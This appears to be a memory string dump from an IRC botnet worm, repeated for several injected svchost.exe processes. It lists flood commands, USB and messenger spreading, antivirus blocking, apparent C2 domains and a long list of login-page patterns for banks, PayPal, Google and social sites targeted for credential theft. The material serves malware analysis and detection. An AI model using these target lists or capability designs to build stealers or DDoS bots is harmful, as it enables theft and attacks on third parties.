CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
%System%\services.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\services.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

svchost.exe_932_rwx_00ED0000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
%System%\svchost.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

svchost.exe_1012_rwx_00B10000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
%System%\svchost.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

svchost.exe_1100_rwx_02FE0000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
%WinDir%\System32\svchost.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

svchost.exe_1144_rwx_00860000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
